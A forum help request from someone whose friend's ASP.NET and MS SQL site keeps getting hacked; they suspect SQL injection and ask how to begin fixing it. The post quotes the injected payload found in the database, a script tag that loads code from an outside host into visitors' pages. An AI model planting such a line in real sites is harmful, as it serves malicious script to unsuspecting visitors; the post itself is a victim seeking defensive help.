google-stats46.info

Please help with a hacked web site. My friend's web site keeps getting hacked. It is built with ASP.NET and MS SQL. Running on Godaddy with IIS 6. The web site has been flagged as malicious by Google. I've found code in almost all of the database tables that goes a little something like this: </title><script src=http://google-stats46.info/ur.php></script> None of the actual .aspx pages have changed, only the info in the database. So, that leads me to believe this was done with SQL injection. Am I right? I think a hacker (or their script) has figured out a way to manipulate the form input or the url of the aspx pages to insert that code into the database. Can someone tell me if I'm on the right track? I know very little about ASP and SQL. I'm hoping someone can point me in the right direction so I can begin learning what I need to know to fix this.